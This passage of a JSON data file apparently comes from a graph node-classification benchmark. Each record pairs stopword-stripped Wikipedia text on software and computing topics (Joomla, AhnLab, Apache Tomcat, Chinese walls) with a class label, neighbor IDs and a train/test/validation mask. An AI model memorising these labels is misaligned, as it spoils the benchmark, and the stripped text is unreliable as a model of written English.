      7983,
      950,
      6713,
      10173,
      2755,
      11076,
      4296,
      10317,
      10575,
      4561,
      722,
      11614,
      1631,
      3296,
      9953,
      5858,
      6759,
      7529,
      4459,
      877,
      237,
      1646,
      7667,
      6389,
      4089,
      894,
      10623
    ],
    "mask": "None"
  },
  {
    "node_id": 1353,
    "label": 5,
    "text": "Joomla:joomla joomla free open-source content management system cms publishing web content developed open source matters inc built model–view–controller web application framework used independently cms joomla written php uses object-oriented programming techniques since version 1.5 software design patterns stores data mysql ms sql since version 2.5 postgresql since version 3.0 database includes features page caching rss feeds printable versions pages news flashes blogs search support language internationalization 8,000 free commercial extensions available official joomla extensions directory available sources estimated second used content management system internet wordpress joomla result fork mambo august 17 2005 time mambo name trademark miro international pvt ltd formed non-profit foundation stated purpose funding project protecting lawsuits joomla development team claimed many provisions foundation structure violated previous agreements made elected mambo steering committee lacked necessary consultation key stakeholders included provisions violated core open source values joomla developers created website called opensourcematters.org osm distribute information software community project leader andrew eddie wrote letter appeared announcements section public forum mamboserver.com one thousand people joined opensourcematters.org within day posting words encouragement support miro ceo peter lamont responded publicly development team article titled mambo open source controversy — 20 questions miro event created controversy within free software community definition open source forums open-source projects active postings actions sides two weeks following eddie announcement teams re-organized community continued grow eben moglen software freedom law center sflc assisted joomla core team beginning august 2005 indicated moglen blog entry date related osm announcement sflc continue provide legal guidance joomla project august 18 andrew eddie called community input suggest name project core team reserved right final naming decision chose name suggested community september 22 new name joomla announced anglicised spelling swahili word meaning together whole also similar meaning least amharic arabic urdu september 26 development team called logo submissions community invited community vote logo team announced community decision september 29 october 2 brand guidelines brand manual set logo resources published joomla thousands verified third party extensions found joomla extensions directory extensions.joomla.org also thousands high end templates available many free paid templates also available come support many templates provide graphical user interface allow change colors fonts layouts features joomla seo tools built includes metadata keywords mod_rewrite support sef urls menu creation clear consistent sitemaps april 25 2014 joomla production leadership team announced started following 'semantic versioning scheme new joomla builds earlier lts long term support sts short term support lifecycle policy longer observed joomla version 3.3.1 first version released new development strategy like many web applications joomla may run lamp stack many web hosts control panels automatic installation joomla windows joomla installed using microsoft web platform installer automatically detects installs dependencies php mysql joomla utilises configuration file configuration.php usually located root joomla installation control various settings including limited database connection settings due use configuration file migrating one server another relatively simple two large joomla conferences year joomla beyond conference largely aimed joomla developers site integrators hosted europe around may year joomla world conference brings together developers designers site administrators business owners community members held latter half year year joomla communities hold country regional joomladays joomla also like many coding communities hosts many regional user groups well joomla extensions extend functionality joomla websites eight types extensions may distinguished components modules plugins templates languages libraries files packages extensions handles specific function many extensions built joomla community free require payment download joomla cms received many awards recognitions since created 2005",
    "neighbors": [
      1920,
      3969,
      3462,
      8582,
      6154,
      908,
      2062,
      9614,
      2576,
      11410,
      148,
      1812,
      6941,
      9245,
      3743,
      10526,
      2465,
      10530,
      2339,
      3876,
      8739,
      4777,
      4010,
      5165,
      7983,
      4529,
      3634,
      7987,
      692,
      8627,
      8883,
      5048,
      6074,
      9276,
      190,
      9666,
      2372,
      8644,
      4171,
      595,
      84,
      4056,
      8539,
      4700,
      6493,
      10587,
      11357,
      3553,
      102,
      7785,
      8554,
      107,
      5612,
      7147,
      3182,
      7022,
      8691,
      8436,
      4853,
      3705,
      11259,
      7293
    ],
    "mask": "Train"
  },
  {
    "node_id": 1354,
    "label": 8,
    "text": "Really_Simple_Discovery:really simple discovery really simple discovery rsd xml format publishing convention making services exposed blog web software discoverable client software way reduce information required set editing/blogging software three well known elements critical settings either defined rsd file related website discoverable using information provided rsd authored daniel berlinger really simple discoverability 1.0 specification make use rsd owner site places link tag head section homepage indicates location rsd file example mediawiki uses tag missing file found clients look default location file named rsd.xml webroot example codice_1 sample rsd file really simple discoverability 1.0 mediawiki example",
    "neighbors": [
      425,
      8070,
      479
    ],
    "mask": "Test"
  },
  {
    "node_id": 1355,
    "label": 4,
    "text": "AhnLab,_Inc.:ahnlab inc. ahnlab inc. founded 1995 security software provider south korea ahnlab sells computer software antivirus software online security network security appliances advanced threat malware detection remediation including apt type cyber attack firewalls ips utm security software online games mobile web ahn cheol-soo founder found computer infected computer virus called c brain developed program find remove named vaccine since anti-virus software called vaccine software korea distributed antivirus program public without charge established ahnlab 1995 dr. ahn promoted new company 1995 since founding 1995 ahnlab become one largest security software companies 50 market share korean security market alone approximately 500 distributors worldwide september 2001 ahnlab listed headquartered seongnam-si gyeonggi-do south korea ahnlab traded kosdaq symbol ahnlab tenth anniversary company founding 2005 ahn cheol-soo resigned position ceo kim cheol-soo appointed successor current ceo hongsun kim appointed 2008 ahnlab selected one korea admired company five years 2004 2010 4 october 2011 ahnlab headquarters moved seongnam-si gyeonggi-do 29 march 2012 ahnlab korean company name changed 주 안철수연구소 주 안랩 annual meeting shareholders ahnlab many security software products pc network mobile including hackshield hacking cheating prevention software suite service mmos used games nexon ncsoft available korean game developers since 2001 american game developers since 2005",
    "neighbors": [
      2049,
      7809,
      131,
      5891,
      1417,
      9356,
      3981,
      10637,
      4374,
      1052,
      156,
      6431,
      2721,
      5924,
      2213,
      550,
      1318,
      6823,
      2601,
      8614,
      939,
      2859,
      3243,
      6699,
      8615,
      6834,
      4403,
      9523,
      10166,
      7103,
      704,
      9537,
      7362,
      10308,
      4421,
      202,
      1355,
      1994,
      5069,
      10574,
      10708,
      2005,
      8024,
      8998,
      1242,
      2907,
      8668,
      11225,
      2654,
      9055,
      9569,
      11622,
      6382,
      4464,
      9713,
      3955,
      6643,
      10740,
      10872,
      9341,
      2558,
      127
    ],
    "mask": "Test"
  },
  {
    "node_id": 1356,
    "label": 4,
    "text": "William_Genovese:william genovese william genovese former greyhat hacker turned security professional goes alias illwill early 2000 genovese former figure loose-knit group computer hackers called illmob illmob.org security community website ran genovese time many high-profile incidents related genovese works private security consultant involved computer security industry penetration testing phishing osint threat intel mitigation also contributor metasploit project 2003 genovese website first release 0day code exploited ms03-026 windows rpc vulnerability later used unknown hackers create variants w32/blaster worm response genovese released tool coded remove worm infected windows pc 2004 federal authorities charged genovese theft trade secret us code title 18 section 1832 selling incomplete windowsnt/2000 microsoft source code microsoft investigators federal agents even though code sold already widely distributed internet prior sale authorities used obscure law enacted economic espionage act 1996 traditionally adjudicated private civil litigation 2005 illmob.org site posted leaked images phone book paris hilton t-mobile sidekick phone obtained fellow hacker reportedly data obtained social engineering exploiting vulnerability bea weblogic server database function allowed attacker remotely read replace file system feeding specially-crafted web request bea produced patch bug march 2003 t-mobile failed apply website also mentioned news articles connection fred durst sex tape leak stolen personal email account 2010 resignation 2016 genovese co-founded board member 501 3 c non-profit hackerspace connecticut called nesit helped local community offering free classes various network security topics personal internet safety reverse engineering embedded electronic projects 3-d printing design helped build virtualized pen-testing lab large server farm donation pharmaceutical company users simulate attacking penetrating machines safe lab environment since 2008 genovese reinvented security consultant public speaker teacher security consulting performs penetration testing services worldwide companies also co-founder speaker security conferences excon bsides connecticut bsidesct 2011 2014 2016 2017 2018 2015 panelist def_con 23 las vegas charity fundraiser help fellow hacker stricken terminal cancer",
    "neighbors": [
      1356
    ],
    "mask": "Test"
  },
  {
    "node_id": 1357,
    "label": 3,
    "text": "Compaq_Presario_5460:compaq presario 5460 compaq presario 5460 ibm compatible pc first launched 1999 bundled 15 crt monitor keyboard mouse jbl stereo speakers 5460 typical new range multimedia pcs debuted around turn millennium 5460 preinstalled microsoft windows 98 first edition available reinstallation via supplied quickrestore disc",
    "neighbors": [
      6765
    ],
    "mask": "Test"
  },
  {
    "node_id": 1358,
    "label": 4,
    "text": "List_of_backup_software:list backup software list backup software performs data backups archivers transfer protocols version control systems often used backups software focused backup listed see comparison backup software features systems listed light purple background longer active development",
    "neighbors": [
      5504,
      7685,
      8582,
      10245,
      5384,
      5769,
      6280,
      10503,
      6796,
      1293,
      3214,
      9484,
      2196,
      11543,
      1560,
      922,
      2970,
      4126,
      3876,
      6565,
      3366,
      6692,
      7718,
      7081,
      11691,
      5677,
      4401,
      5300,
      2487,
      823,
      11065,
      9530,
      2107,
      956,
      11581,
      5313,
      8897,
      9025,
      6852,
      9925,
      8262,
      10623,
      3913,
      9802,
      9421,
      3794,
      2515,
      10711,
      3800,
      1885,
      4574,
      5599,
      11492,
      9320,
      5737,
      8554,
      3692,
      3053,
      6768,
      9585,
      9842,
      11633,
      10101,
      7417,
      2940,
      2045,
      1150,
      9983
    ],
    "mask": "None"
  },
  {
    "node_id": 1359,
    "label": 2,
    "text": "CMS_Pipelines:cms pipelines cms pipelines implements pipeline concept vm/cms operating system programs pipeline operate sequential stream records program writes records read next program pipeline program combined reading writing done device independent interface cms pipelines provides cms command pipe argument string pipe command pipeline specification pipe selects programs run chains together pipeline pump data cms programs utilities n't provide device independent stdin stdout interface cms pipelines built-in library programs called pipeline specification built-in programs interface operating system perform many utility functions data cms structured logical records rather stream bytes textual data line text corresponds logical record cms pipelines data passed stages logical records cms pipelines users issue pipeline commands terminal exec procedures users write programs rexx used addition built-in programs simple example reads disk file separates records containing string hello selected records modified appending string world records translated upper case two streams combined records written new output file example codice_1 stage reads input disk file passes records next stage pipeline codice_2 stage separates input stream two output streams primary output codice_2 records containing hello passes records codice_4 stage codice_4 stage modifies input records specified arguments passes output output connected codice_6 combines records input streams form single output stream output written new disk file secondary output codice_2 marked second occurrence codice_8 label contains records meet selection criterion records translated upper case codice_9 stage passed secondary input stream codice_6 marked second occurrence codice_11 label pipeline topology example consists two connected pipelines end character codice_12 example separates individual pipelines pipeline set records read input file pass either two routes pipeline topology neither routes contain stages need buffer records cms pipelines ensures records arrive codice_6 order passed codice_2 example pipeline presented 'portrait form individual stages separate lines pipeline typed cms command stages written single line concept simple pipeline extended ways cms pipelines offers several features improve robustness programs john hartmann ibm denmark started development cms pipelines 1980 product marketed ibm separate product 80 integrated vm/esa late 1991 release vm cms pipelines code upgraded well functionally frozen 1.1.10 level vm/esa 2.3 1997 since latest level cms pipelines available download cms pipelines homepage users wish explore new function current level cms pipelines included z/vm 6.4 available since november 11 2016 implementation cms pipelines tso released 1995 batchpipeworks batchpipes/mvs product up-to-date tso implementation available service offering ibm denmark 2010 versions maintained single source code base commonly referred cms/tso pipelines specification available author edition",
    "neighbors": [
      4417,
      9345,
      8523,
      7983,
      8499,
      7733,
      3323
    ],
    "mask": "Validation"
  },
  {
    "node_id": 1360,
    "label": 2,
    "text": "Stephen_C._Johnson:stephen c. johnson stephen curtis johnson known steve johnson computer scientist worked bell labs nearly 20 years best known yacc lint spell portable c compiler contributed spread unix c. also contributed fields diverse computer music psychometrics vlsi design johnson passion computing started age five grandfather took along work bureau standards computer saw size small house made strong impression decided wanted work computers never looked back computer science classes college studied mathematics eventually earned phd johnson joined bell labs 1960s worked unix tools nearly 20 years alongside computer scientists like jeffrey ullman dennis ritchie alfred aho best known writing yacc lint portable c compiler mid-1970s johnson bell colleague dennis ritchie co-authored first unix port also demonstrated unix portable ritchie considers spark led unix becoming widespread mid-1980s served head unix languages department unix system v johnson developed yacc early '70s wanted insert exclusive operator ritchie b language compiler bell labs colleague alfred aho suggested look donald knuth work lr parsing served basis yacc 2008 interview johnson reflected contribution yacc made spread unix c 'm proudest lint developed 1978 johnson debugging yacc grammar writing c struggling portability issues stemming porting unix 32-bit machine 1986 johnson moved silicon valley joined several startups worked mostly compilers also 2d 3d graphics massively parallel computing embedded systems startups included dana computer inc. melismatic software transmeta made low-power intel-compatible microprocessors johnson served usenix board ten years including four years president early 1990s serves usenix representative computing research association 2002 moved boston work mathworks helped maintain front end matlab programming language also built lint product called m-lint met mathworks founder cleve moler working silicon valley startup developed long-distance consulting relationship 1990s johnson currently lives morgan hill california works machine learning wave computing startup develops energy-efficient computers machine learning",
    "neighbors": [
      1952,
      3488,
      7872,
      2155,
      3468,
      2798,
      1552,
      2995,
      5492,
      2045,
      7326,
      8671
    ],
    "mask": "Validation"
  },
  {
    "node_id": 1361,
    "label": 2,
    "text": "Automated_Testing_Framework:automated testing framework automated testing framework atf testing framework originally created netbsd google summer code project 2007 automated testing framework also used many mobile phone companies test latest applications updated os atf useful tool many basic time-consuming works clicking switching applications repeatedly developers addition daily regression test increase chance catch bugs release new features atf software testing framework test cases written posix shell c c++ primary goal atf project tests self-contained intended executed end users periodically released two-clause bsd license",
    "neighbors": [
      1286,
      1801,
      10000,
      274,
      9762,
      8998,
      1071,
      11442,
      11698,
      9671,
      1993,
      8909,
      7383,
      4571,
      7907,
      2415,
      8816,
      2545,
      11506,
      2045,
      9343
    ],
    "mask": "None"
  },
  {
    "node_id": 1362,
    "label": 7,
    "text": "VCloud_Air:vcloud air vcloud air public cloud computing service built vsphere vmware vcloud air three infrastructure service iaas subscription service types dedicated cloud virtual private cloud disaster recovery vcloud air also offers pay-as-you-go service named virtual private cloud ondemand q2 2017 vmware sold vcloud air french cloud service provider ovh vmware announced vcloud initiative 2008 vmworld conference las vegas garnered significant press attention 2009 vmworld conference san francisco vcloud featured vcloud pavilion vcloud also subject 2010 vmworld conference may 21 2013 early access program vcloud hybrid service launched august 26 2013 general availability announced vcloud hybrid service including features draas direct connect vcloud hybrid service rebranded vcloud air august 21 2014. vcloud air provides hybrid cloud—a public iaas functions extension existing data centers running vmware vsphere common management networking rebrand service also announced cloud computing demand program allows users pay user needs use resources vcloud air mobile announced august 25 2014 added integration airwatch pivotal cloud foundry 4 april 2017 french cloud provider ovh announced intent acquire vmware vcloud air business personnel acquisition completed q2 2017 similar public cloud providers vcloud air supports concept regions locations vcloud terminology typically used better pricing increase application performance disaster recovery vcloud air offered public california nevada texas virginia new jersey united states internationally available united kingdom germany japan australia government users access two additional locations one arizona another virginia vcloud air supports 5,000 applications 90+ operating systems certified run vsphere use vcloud air allows seamless workload portability migration due vsphere means rewrites recoding moving workloads on-premises data center cloud vice versa network virtualization allows users configure firewalls network mirror on-site networks including nat rules firewall rules networks public ips virtual private cloud ondemand self-service demand cloud computing platform vcloud air infrastructure-as-a-service iaas pay-as-you-go offering allows users consume specific vcpu storage vram network ip needed additionally service allows adjusting powered-on state virtual machines vmware announced plans vcloud air virtual private cloud ondemand early access program october 14 2014 program officially launched november 17 2014 included 1,000 service credits approved users virtual private cloud ondemand officially released publicly january 20 2015 initial offering 300 service credits used first 90 days signing also announced basic configuration includes virtual machine 1gb ram 1 vcpu 20gb ssd storage 0.07 hour currently service offers choices three operating systems additionally users consume 16 vcpus 120 gb memory storage options include users also 20 public ip addresses support levels vary online support 7 total invoice production support 100 12 whichever greater",
    "neighbors": [
      1539,
      6150,
      6153,
      3082,
      526,
      10265,
      5662,
      5666,
      9766,
      39,
      3121,
      5681,
      7733,
      5697,
      10820,
      5702,
      4683,
      590,
      1102,
      7248,
      5202,
      4194,
      5732,
      2170,
      4236,
      10893,
      4238,
      6307,
      2212,
      2217,
      9906,
      7349,
      7352,
      2236,
      7357,
      4289,
      3269,
      6367,
      2795,
      8439,
      9466,
      253,
      8446,
      5378,
      8451,
      272,
      2328,
      4377,
      8986,
      11038,
      6438,
      295,
      10537,
      6444,
      8495,
      318,
      11070,
      8515,
      4429,
      7507,
      7512,
      2910,
      3428,
      10090,
      8044,
      6514,
      11646,
      6018,
      6027,
      911,
      1935,
      8592,
      405,
      9655,
      5049,
      10681,
      448,
      11201,
      9682,
      467,
      10200,
      6618,
      11235,
      6632,
      1001,
      1513,
      7660,
      8191
    ],
    "mask": "None"
  },
  {
    "node_id": 1363,
    "label": 8,
    "text": "Apache_Tomcat:apache tomcat apache tomcat also referred tomcat server implements several java ee specifications including java servlet javaserver pages jsp java el websocket provides pure java http web server environment java code run tomcat developed maintained open community developers auspices apache software foundation released apache license 2.0 license open-source software tomcat 4.x released catalina servlet container coyote http connector jasper jsp engine catalina tomcat servlet container catalina implements sun microsystems specifications servlet javaserver pages jsp tomcat realm element represents database usernames passwords roles similar unix groups assigned users different implementations realm allow catalina integrated environments authentication information already created maintained use information implement container managed security described servlet specification coyote connector component tomcat supports http 1.1 protocol web server allows catalina nominally java servlet jsp container also act plain web server serves local files http documents coyote listens incoming connections server specific tcp port forwards request tomcat engine process request send back response requesting client another coyote connector coyote jk listens similarly instead forwards requests another web server apache using jk protocol usually offers better performance jasper tomcat jsp engine jasper parses jsp files compile java code servlets handled catalina runtime jasper detects changes jsp files recompiles version 5 tomcat uses jasper 2 implementation sun microsystems jsp 2.0 specification jasper jasper 2 important features added three new components added release tomcat 7 component added manage large applications used load balancing achieved many techniques clustering support currently requires jdk version 1.5 higher high-availability feature added facilitate scheduling system upgrades e.g new releases change requests without affecting live environment done dispatching live traffic requests temporary server different port main server upgraded main port useful handling user requests high-traffic web applications also added user- well system-based web applications enhancement add support deployment across variety environments also tries manage sessions well applications across network tomcat building additional components number additional components may used apache tomcat components may built users need downloaded one mirrors tomcat 7.x implements servlet 3.0 jsp 2.2 specifications requires java version 1.6 although previous versions run java 1.1 1.5 versions 5 6 saw improvements garbage collection jsp parsing performance scalability native wrappers known tomcat native available microsoft windows unix platform integration tomcat 8.x implements servlet 3.1 jsp 2.3 specifications apache tomcat 8.5.x intended replace 8.0.x includes new features pulled forward tomcat 9.0.x minimum java version implemented specification versions remain unchanged tomcat started servlet reference implementation james duncan davidson software architect sun microsystems later helped make project open source played key role donation sun microsystems apache software foundation apache ant software build automation tool developed side-effect creation tomcat open source project davidson initially hoped project would become open sourced since many open source projects o'reilly books associated featuring animal cover wanted name project animal came tomcat since reasoned animal represented something could fend although tomcat already use another o'reilly title wish see animal cover eventually came true o'reilly published tomcat book snow leopard cover 2003 apache software built part community process involves user developer mailing lists developer list discussion building testing next release takes place user list users discuss problems developers users free apache tomcat resources communities include tomcatexpert.com springsource sponsored community developers operators running apache tomcat large-scale production environments mulesoft apache tomcat resource center instructional guides installing updating configuring monitoring troubleshooting securing various versions tomcat apache tomee pronounced tommy java enterprise edition apache tomcat tomcat java ee tomee combines several java enterprise projects including apache openejb apache openwebbeans apache openjpa apache myfaces others october 2011 project obtained certification oracle corporation compatible implementation java ee 6 web profile",
    "neighbors": [
      9229,
      7695,
      6161,
      1047,
      8217,
      5660,
      2596,
      9252,
      11303,
      44,
      5677,
      10800,
      6714,
      9789,
      7742,
      64,
      7233,
      7750,
      1095,
      4171,
      595,
      7261,
      8799,
      2658,
      8294,
      8810,
      9834,
      3182,
      11376,
      2163,
      6774,
      3705,
      11386,
      10377,
      6797,
      8860,
      8350,
      4768,
      3746,
      3237,
      1705,
      7338,
      9387,
      10924,
      11439,
      4797,
      5314,
      6338,
      1222,
      4294,
      6860,
      8408,
      225,
      1250,
      4837,
      8425,
      747,
      6379,
      2287,
      5872,
      2304,
      4358,
      7430,
      8460,
      1296,
      7443,
      5910,
      5399,
      8986,
      10526,
      7457,
      8994,
      3877,
      1327,
      3895,
      4919,
      1851,
      7485,
      4419,
      2377,
      3920,
      4944,
      6993,
      4439,
      4960,
      865,
      2404,
      11111,
      9580,
      10611,
      9078,
      1913,
      3966,
      10622,
      1920,
      11134,
      4485,
      4997,
      910,
      7567,
      1937,
      11161,
      6555,
      11682,
      9125,
      10661,
      5031,
      11693,
      9138,
      6067,
      437,
      5047,
      5048,
      4538,
      6074,
      10683,
      3517,
      5567,
      9665,
      1991,
      5066,
      8139,
      3545,
      9179,
      990,
      10719,
      11235,
      5093,
      3558,
      11237,
      3560,
      3561,
      3562,
      8691,
      7159,
      1018,
      6143
    ],
    "mask": "None"
  },
  {
    "node_id": 1364,
    "label": 4,
    "text": "Chinese_wall:chinese wall chinese wall business term describing information barrier within organization erected prevent exchanges communication could lead conflicts interest example chinese wall may erected separate isolate people make investments privy confidential information could improperly influence investment decisions firms generally required law safeguard insider information ensure improper trading occur disputes use term decades particularly legal banking sectors term seen culturally insensitive inappropriate reflection chinese culture trade extensively integrated global market peat marwick mitchell co. v. superior court 1988 presiding justice harry w. low chinese american wrote concurring opinion specifically order express profound objection use phrase context called term piece legal flotsam emphatically abandoned suggested ethics wall suitable alternative maintained continued use term would insensitive ethnic identity many persons chinese descent alternative phrases include screen firewall cone silence ethical wall screen verb screen preferred term american bar association model rules professional conduct chinese wall commonly employed investment banks corporate-advisory area brokering department order separate giving corporate advice takeovers advising clients buying shares wall thrown prevent leaks corporate inside information could influence advice given clients making investments allow staff take advantage facts yet known general public phrase already wall used equity research personnel refer rank-and-file personnel operate without chinese wall times examples include members chinese wall department compliance personnel attorneys certain nyse-licensed analysts term wall used employee normally privy wall-guarded information somehow obtains sensitive information breaches considered semi-accidental typically met punitive action heyday dot-com era instances involving conflicts interest rampant era major scandal exposed discovered research analysts encouraged blatantly publish dishonest positive analyses companies related parties owned shares companies depended investment banking departments research firms u.s. government since passed laws strengthening use chinese walls title v sarbanes-oxley act order prevent conflicts interest chinese walls also used corporate finance departments big four large accountancy financial services firms designed insulate sensitive documentation wider firm order prevent conflicts term used journalism describe separation editorial advertising arms chinese wall regarded breached advertorial projects term used property casualty insurance describe separation claim handling parties claim e.g airport airline insurance policies insurer claim handling process needs segregated within organisation avoid conflict interest also occurs unidentified uninsured motorist involved auto collision case two loss adjusters take claim one representing insured party another representing uninsured unidentified motorist represent policy must investigate negotiate determine fault anything covered policy case chinese wall erected two adjusters chinese walls used law firms one part firm representing party deal litigation separated another part firm contrary interests confidential information adverse party uk law firm may represent competing parties suit strictly defined situations individual fee earners act sides united states law firms use chinese walls longer permitted except within narrow exceptions american bar association model rules professional conduct 2004 state lawyers associated firm none shall knowingly represent client one practicing alone would prohibited rules 1.7 1.9 unless prohibition based personal interest prohibited lawyer present significant risk materially limiting representation client remaining lawyers firm although aba rules advisory u.s. states adopted even stricter regulations place computer science concept chinese wall used operating system computer security us judicial system protection copyright infringement computer security concerns software stability operating system concept involved important business matter concerning licensing computer many software hardware components hardware component requires direct software interaction license license software driver running operating system reverse engineering software part computer science involve writing driver piece hardware order enable work operating system unsupported manufacturer hardware add functionality increase performance operations provided manufacturer supported operating system restore usage piece computer hardware driver disappeared altogether reverse engineered driver offers access development persons outside company manufactured general hardware usage case-law mechanism called clean room design employed avoid copyright infringement reverse engineering proprietary driver involves two separate engineering groups separated chinese wall one group works hardware reverse engineer must original algorithms documents findings group writes code based documentation new code begins function tests hardware able refined developed time method insulates new code old code reverse engineering less likely considered jury derived work basic model used provide privacy integrity data chinese wall model brewer nash model security model read/write access files governed membership data conflict-of-interest classes datasets origin phrase great wall china term popularized united states following stock market crash 1929 u.s. government legislated information separation investment bankers brokerage firms order limit conflict interest objective company analysis desire successful initial public offerings rather prohibiting one company engaging businesses government permitted implementation chinese wall procedures leading note subject published 1980 university pennsylvania law review titled chinese wall defense law-firm disqualification perpetuated use term",
    "neighbors": [
      3616,
      2948,
      10245,
      7983,
      10173,
      6162,
      3417,
      9117,
      2558
    ],
    "mask": "None"
  },
  {
    "node_id": 1365,
    "label": 9,
    "text": "Corman_Common_Lisp:corman common lisp corman common lisp commercial implementation common lisp programming language featuring support windows operating system corman common lisp commercial software 2013 roger corman author indicated considering converting open source january 2015 published source code corman lisp github repository mit license corman common lisp designed implemented corman technologies 1995 previously developed powerlisp mac corman cl complete rewrite windows powerlisp longer developed supported developed maintained corman cl new major releases every 18 months minor updates often 2006 clos implementation originally art metaobject protocol closette extensively rewritten add missing common lisp features improve performance january 2015 roger corman permission corman common lisp copied github made open source mit license future development corman common lisp done location",
    "neighbors": [
      10752,
      11269,
      2062,
      9231,
      9749,
      8728,
      4633,
      4122,
      8226,
      2105,
      6201,
      6717,
      8258,
      8771,
      8262,
      1613,
      9299,
      3675,
      7267,
      8293,
      3176,
      2666,
      2667,
      5751,
      7805,
      9865,
      6797,
      9877,
      4779,
      5803,
      2225,
      8883,
      7867,
      4799,
      7880,
      8908,
      205,
      7896,
      10463,
      7392,
      7904,
      11488,
      5360,
      5361,
      8435,
      6906,
      4865,
      3334,
      6919,
      1301,
      10012,
      3869,
      2335,
      7983,
      10547,
      311,
      6969,
      11083,
      3413,
      2392,
      6493,
      10083,
      6502,
      3446,
      4992,
      2438,
      7562,
      6556,
      6047,
      1952,
      4516,
      5031,
      1448,
      9128,
      5569,
      6594,
      4550,
      11218,
      11221,
      10712,
      3034,
      4074,
      3051,
      11255,
      4606
    ],
    "mask": "Test"
  },
  {
    "node_id": 1366,
    "label": 1,
    "text": "SQL_Server_Reporting_Services:sql server reporting services sql server reporting services ssrs server-based report generating software system microsoft part suite microsoft sql server services including ssas sql server analysis services ssis sql server integration services administered via web interface used prepare deliver variety interactive printed reports ssrs service provides interface microsoft visual studio developers well sql administrators connect sql databases use ssrs tools format sql reports many complex ways also provides 'report builder tool less technical users format sql reports lesser complexity ssrs competes crystal reports business intelligence tools reporting services first released 2004 add-on sql server 2000 subsequent versions sql server data tools business intelligence ssdt bi reduces rdl report definition language component graphic icons gui graphical user interface way instead writing code user drag-and-drop graphic icons ssrs report format aspects ssrs report reports defined rdl downloaded variety formats including excel pdf csv xml tiff image formats html web archive sql server 2008 2012 ssrs also prepare reports microsoft word doc format third-party report generators offer additional output formats users interact report server web service directly instead use report manager web-based application interfaces report server web service report manager users view subscribe manage reports well manage maintain data sources security settings report manager also deliver sql reports e-mail place file share security role-based assigned individual item report data source folder items site wide security roles rights inherited overloaded rdl reports viewed using standalone report server comes microsoft sql server using asp.net reportviewer web control using reportviewer windows forms control latter method allows reports embedded directly web pages .net windows applications reportviewer control process reports server processing report rendered report server b local processing control renders rdl file sql server reporting services also support ad hoc reports designer develops report schema deploys reporting server user choose relevant fields/data generate reports users download reports locally microsoft sql server 2012 sp1 expands microsoft support viewing reports mobile platforms including microsoft surface apple ios 6 windows phone 8",
    "neighbors": [
      8835,
      10900,
      10902,
      11030,
      3224,
      5401,
      7064,
      11414,
      4384,
      8227,
      11683,
      11559,
      1832,
      4010,
      2603,
      1964,
      10157,
      9263,
      11570,
      8627,
      6709,
      8246,
      315,
      7486,
      4674,
      1347,
      1348,
      5320,
      4174,
      847,
      210,
      83,
      9434,
      603,
      479,
      608,
      2401,
      8161,
      7523,
      3303,
      11498,
      3821,
      10991,
      3573,
      9205,
      119,
      5754,
      3965,
      2558,
      2943
    ],
    "mask": "Validation"
  },
  {
    "node_id": 1367,
    "label": 8,
    "text": "Oracle_HTTP_Server:oracle http server oracle http server ohs web server based apache http server created oracle technology network web server based apache version 2.2 ohs like apache 2.2 includes support ipv6 web tier component oracle fusion middleware features",
    "neighbors": [
      225,
      1250,
      865,
      8994,
      4233,
      9580,
      10553,
      5470
    ],
    "mask": "Train"
  },
  {
    "node_id": 1368,
    "label": 4,
    "text": "Privacy-enhancing_technologies:privacy-enhancing technologies privacy-enhancing technologies pet methods protecting data accordance law pet allow online users protect privacy personally identifiable information pii provided handled services applications pet uses techniques minimize possession personal data without losing functionality information system objective pets protect personal data ensure users technology information confidential management data protection priority organizations withhold responsibility pii allowing users take one following actions related personal data sent used online service providers merchants users goal privacy-enhancing technologies include increasing control personal data sent used online service providers merchants online users self-determination pets aim minimize personal data collected used service providers merchants use pseudonyms anonymous data credentials provide anonymity strive achieve informed consent giving personal data online service providers merchants privacy negotiations consumers service providers establish maintain refine privacy policies individualized agreements ongoing choice among service alternatives therefore providing possibility negotiate terms conditions giving personal data online service providers merchants data handling/privacy policy negotiation within private negotiations transaction partners may additionally bundle personal information collection processing schemes monetary non-monetary rewards pets provide possibility remotely audit enforcement terms conditions online service providers merchants assurance allow users log archive look past transfers personal data including data transferred conditions facilitate use legal rights data inspection correction deletion privacy-enhancing technologies distinguished based assumption assumed third-party trusted processing data model based control audit example technologies single entity violate privacy user assumes third-parties trusted data protection goal data minimization reduction trust third-parties examples technologies include used democratic elections examples existing privacy enhancing technologies examples privacy enhancing technologies researched developed include limited disclosure technology anonymous credentials online car rental negotiation enforcement data handling conditions data transaction log limited disclosure technology provides way protecting individuals privacy allowing share enough personal information service providers complete interaction transaction technology also designed limit tracking correlation users ’ interactions third parties limited disclosure uses cryptographic techniques allows users retrieve data vetted provider transmit data relying party relying parties trust authenticity integrity data anonymous credentials asserted properties rights credential holder n't reveal true identity holder information revealed holder credential willing disclose assertion issued user himself/herself provider online service third party another service provider government agency etc. example online car rental car rental agency n't need know true identity customer needs make sure customer 23 example customer drivers license health insurance i.e accidents etc customer paying thus real need know customers name address personal information anonymous credentials allow parties comfortable allow customer reveal much data car rental agency needs providing service data minimization allow car rental agency verify requirements get money ordering car online user instead providing classical name address credit card number provides following credentials issued pseudonyms i.e real name customer negotiation enforcement data handling conditions ordering product service online user online service provider merchant negotiate type personal data transferred service provider includes conditions shall apply handling personal data whether may sent third parties profile selling conditions e.g informing user time future shall deleted transfer personal data took place agreed upon data handling conditions technically enforced infrastructure service provider capable managing processing data handling obligations moreover enforcement remotely audited user example verifying chains certification based trusted computing modules verifying privacy seals/labels issued third party auditing organisations e.g data protection agencies thus instead user rely mere promises service providers abuse personal data users confident service provider adhering negotiated data handling conditions lastly data transaction log allows users ability log personal data send service provider time conditions logs stored allow users determine data sent establish type data possession specific service provider leads transparency pre-requisite control pets general anonymous credentials privacy policy negotiation",
    "neighbors": [
      2818,
      8329,
      1930,
      3599,
      1169,
      3858,
      10002,
      2725,
      3880,
      9260,
      9901,
      2737,
      6455,
      3774,
      8640,
      3521,
      10831,
      1256,
      6509,
      4213,
      5373,
      2047
    ],
    "mask": "None"
  },
  {
    "node_id": 1369,
    "label": 4,
